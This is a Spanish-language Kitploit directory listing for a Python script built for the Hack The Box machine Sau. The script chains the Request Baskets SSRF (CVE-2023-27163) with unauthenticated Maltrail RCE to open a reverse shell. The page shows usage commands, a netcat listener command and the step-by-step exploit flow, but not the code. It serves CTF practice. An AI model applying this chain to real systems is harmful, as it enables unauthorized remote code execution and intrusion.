Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
htb-sau-exploit-chain — Cadena de explotación automatizada para HTB Sau — CVE-2023-27163 (SSRF) + Maltrail Unauthenticated RCE → Reverse Shell | Kitploit
Herramientas/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

Cadena de explotación automatizada para HTB Sau — CVE-2023-27163 (SSRF) + Maltrail Unauthenticated RCE → Reverse Shell

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 mesesAún no revisado

HTB Sau Exploit Chain — CVE-2023-27163 (SSRF) + Maltrail RCE Automatización

Un script de exploit en Python que encadena CVE-2023-27163 (Server-Side Request Forgery en Request Baskets ≤ 1.2.1) con una vulnerabilidad de Ejecución Remota de Código no autenticada en Maltrail 0.53, entregando una reverse shell. Diseñado para la máquina Sau de Hack The Box.


📌 Resumen

Este script automatiza la ruta de explotación necesaria para obtener acceso inicial en el objetivo mediante:

  1. Explotar CVE-2023-27163 para obtener un endpoint de bucket utilizable
  2. Aprovechar el servicio expuesto para interactuar con Maltrail
  3. Desencadenar un RCE no autenticado en Maltrail
  4. Entregar una reverse shell a la máquina atacante

⚙️ Uso

root@kitploit:~
python3 exploit.py <URL_OBJETIVO> <IP_ESCUCHA> <PUERTO_ESCUCHA>

Ejemplo:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Listener Netcat (Importante)

Antes de ejecutar el exploit, inicie un listener en su máquina para recibir la reverse shell:

root@kitploit:~
nc -lvnp <PUERTO_ESCUCHA>

Ejemplo:

root@kitploit:~
nc -lvnp 4444

🧩 Parámetros

ParámetroDescripción
URL_OBJETIVOURL base del objetivo (ej., http://IP)
IP_ESCUCHAIP de su máquina atacante
PUERTO_ESCUCHAPuerto para recibir la reverse shell

🚀 Flujo del Exploit

  • Normalizar la URL del objetivo
  • Desencadenar CVE-2023-27163 para crear/acceder a un request basket
  • Extraer el endpoint accesible (bucket_url)
  • Usar el bucket para interactuar con Maltrail
  • Ejecutar el payload para generar una reverse shell

⚠️ Notas

  • Asegúrese de que su listener esté ejecutándose antes de ejecutar el script
  • Elimine la barra diagonal final (/) de la URL del objetivo (se maneja automáticamente en el script)
  • Diseñado específicamente para la máquina HTB Sau — puede no generalizarse

📚 Referencias

  • CVE-2023-27163 (Request Baskets)
  • Maltrail RCE no autenticado

🛑 Aviso

Este proyecto está destinado fines educativos y su uso en entornos autorizados como Hack The Box. No lo utilice contra sistemas sin el permiso adecuado.

Descargar herramienta